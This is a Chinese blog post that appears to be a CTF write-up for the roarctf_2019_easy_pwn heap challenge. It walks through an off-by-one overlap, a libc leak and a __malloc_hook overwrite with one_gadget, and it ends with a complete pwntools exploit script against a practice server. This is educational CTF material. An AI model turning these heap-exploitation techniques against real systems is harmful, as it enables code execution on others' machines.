roarctf_2019_easy_pwn

最新推荐文章于 2023-09-26 11:38:09 发布
最新推荐文章于 2023-09-26 11:38:09 发布
阅读量511 收藏 4
点赞数 1
分类专栏: # CTF_PWN 文章标签: pwn ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52772399/article/details/128346013
版权

roarctf_2019_easy_pwn 复现

这是ubuntu16的堆题了,看起来都是古老题目,也很有必要去整理一下思路。这是必不可少的过程。

来看看检查
在这里插入图片描述
保护尽开,开启了RELRO保护,got表不可写,只能想办法修改hook表了

反汇编直接看漏洞,在edit函数中
在这里插入图片描述
当我们要修改的size大于原来size 10 的时候,触发off-by-one,可以多写入一个字节

free后,指针置空,没毛病
在这里插入图片描述

整理一下思路

  • 通过off-by-one构造叠堆
  • 泄露libc
  • 申请chunk地址到malloc_hook
  • 修改malloc_hook内容为one_gadget
  • 执行one_gadget

第一步:分配堆块

add(0x18) #0	
add(0x10) #1
add(0x90) #2
add(0x10) #3

为什么是 0x18 ,这样可以把内存申请到下一个chunk的prve_size 的位置,正好下一个地址就是size,触发off-by-one,就可以修改下一个堆块的size
在这里插入图片描述

第二步:触发off-by-one修改chunk0,将chunk1的size改为0xa1,同时呢,还要修改chunk2,让伪造的chunk1通过检查

payload = b"a"*0x10 + p64 (0x20) + p8(0xa1)
edit(0,0x18+10,payload)

payload = p64(0)*0xe + p64(0xa0) + p64(0x21)
edit(2,0x80,payload)

在这里插入图片描述

第三步:这时候,释放掉chunk1,重新申请。这样chunk1chunk2就有重叠部分。因为申请内存是calloc函数,在申请内存时会导致数据清空,因此要修改一下chunk2的size

delete(1)
add(0x90)

payload = p64(0)*3 + p64(0xa1)
edit(1,0x20,payload)

重叠部分
在这里插入图片描述
在这里插入图片描述

第四步:把chunk2释放掉后,chunk2进入unsorted bin,打印chunk1(chunk1部分包含了chunk2),会把unsorted bin输出出来。就能得到main_arena+offset的地址

delete(2)
show(1)

libc_base = uu64() - 0x3c4b78
malloc_hook = libc.sym["__malloc_hook"] + libc_base
realloc_hook = libc.sym["realloc"] + libc_base

在这里插入图片描述
在这里插入图片描述

第五步:重新申请chunk2,构造chunk2,然后释放。修改chunk2的链表地址为malloc_hook,把堆块申请到malloc_hook

add(0x80) #2
payload = p64(0)*3+p64(0x71)+p64(0)*12 + p64(0x70) + p64(0x21)
edit(1,0x90,payload)
delete(2)

payload = p64(0)*3 + p64(0x71) + p64(malloc_hook - 0x23)*2
edit(1,0x30,payload)
add(0x60)
add(0x60) #4

修改地址成功
在这里插入图片描述

解释一下为什么要写入malloc_hook - 0x23,这样看这个堆块的size就是0x70,这么做也就是为了绕过检查
在这里插入图片描述

第六步:申请到堆块后,修改malloc_hook的内容为 one_gadget。最后,申请堆块执行one_gadget

one = [0x45216,0x4526a,0xf1147,0xf02a4]
one_gadget = libc_base + one[2]

payload = b"a"*11 + p64(one_gadget) + p64(realloc_hook+4)
edit(4,27,payload)

add(0x60)
ia()

这里为什么要写入realloc_hook+4 ? one_gadget执行是需要条件的
在这里插入图片描述
realloc_hook+4的代码是push r13,它的作用呢,是用来调栈帧的
在这里插入图片描述

exp

from pwn import * 

binary = "./pwn"
elf = ELF(binary)
libc = ELF("libc-2.23.so") 
ip = 'node4.buuoj.cn'
port = 27435
local = 0
if local:
	io = process(binary)
else:
	io = remote(ip, port)

#context.log_level = "debug"

def debug():
	gdb.attach(io)
	pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def menu(idx):
	sla("choice: ",str(idx))

def add(size):
	menu(1)
	sla("size: ",str(size))

def edit(idx,size,content):
	menu(2)
	sla("index: ",str(idx))
	sla("size: ",str(size))
	sla("content: ",content)

def delete(idx):
	menu(3)
	sla("index: ",str(idx))

def show(idx):
	menu(4)
	sla("index: ",str(idx))

add(0x18)
add(0x10) #1
add(0x90) #2
add(0x10)

payload = b"a"*0x10 + p64(0x20) + p8(0xa1)
edit(0,0x18+10,payload)

payload = p64(0)*0xe + p64(0xa0) + p64(0x21)
edit(2,0x80,payload)

delete(1)
add(0x90)

payload = p64(0)*3 + p64(0xa1)
edit(1,0x20,payload)
delete(2)

show(1)

libc_base = uu64() - 0x3c4b78
lg("libc_base")
malloc_hook = libc.sym["__malloc_hook"] + libc_base
realloc_hook = libc.sym["realloc"] + libc_base
lg("malloc_hook")
lg("realloc_hook")

add(0x80)
payload = p64(0)*3+p64(0x71)+p64(0)*12 + p64(0x70) + p64(0x21)
edit(1,0x90,payload)

delete(2)
payload = p64(0)*3 + p64(0x71) + p64(malloc_hook - 0x23)*2
edit(1,0x30,payload)

add(0x60)
add(0x60)


one = [0x45216,0x4526a,0xf1147,0xf02a4]
one_gadget = libc_base + one[2]

payload = b"a"*11 + p64(one_gadget) + p64(realloc_hook+4)
edit(4,27,payload)
add(0x60)

ia()

success!!!
在这里插入图片描述

ReTCyc1e
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnroarctf_2019_easy_pwn
Nothing
12-24 2075
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1100
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2215
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
2021-NCTF pwn方向题目复现
Amalllの博客
12-01 3444
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
[HGAME 2023 week1] PWN 复现
Xzzzz911的博客
09-04 985
先ida一下,可以看出来需要进行栈迁移,并且还存在沙盒,还有一段0x30的空间(溢出的空间较大),这就是为什么exp和[NSSCTF Round#14 Basic] rbp 不一样的原因,可溢出的空间不同,导致所利用的条件不同。首先ida一下,可以很明显的了解到跟沙盒有关,再查一下沙盒机制,显然不能直接构造orw,再加上read所存储的字节数少,不能直接构造,所以可以在mmap上面来构造orw。先泄露libc,再把orw写在自己确定的bss段,再用 leave ret 转到bss段,执行orw。
2023羊城杯--pwn-heap复现
最新发布
fuiifiuiii的博客
09-26 257
​ 可以看到,配合new(0x62)或(0x68)以后,delete(这里仅仅是为了达成能够往下修改的效果),然后连续创建两个(0x58),可以覆盖0x60,然后刚好达到第二堆块的index_chunk区域,从而修改指针。另外:这里被free掉的堆块也不会被再次使用,能够正确覆写的原因就是这个堆管理的表(也就是用了第一个堆来存储用到的堆的数据域的地址)可能发现用它的过程:从strtok的调用中,si进入发现got表跳转的第一个函数是它,然后用libc找到相应的位置,进行更改。
easypwn
zip471642048的博客
12-01 269
esaypwn
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 3638
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
攻防世界easypwn
weixin_44447516的博客
08-01 465
攻防世界 EasyPwn
[RoarCTF 2019]Easy Calc
m0_62905261的博客
09-28 792
[RoarCTF 2019]Easy Calc
roarctf_2019_easy_pwn 1/100
m0_57754423的博客
02-22 1489
edit chunk的功能里 存在off_by_one漏洞。 利用思路: 构造堆块重叠 然后house of sprit。 exp: from pwn import * p = process("./roarctf_2019_easy_pwn") e = ELF("./roarctf_2019_easy_pwn") libc = e.libc context.log_level = "debug" p.timeout = 0.1 def add(size): p.recvuntil("./ch
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值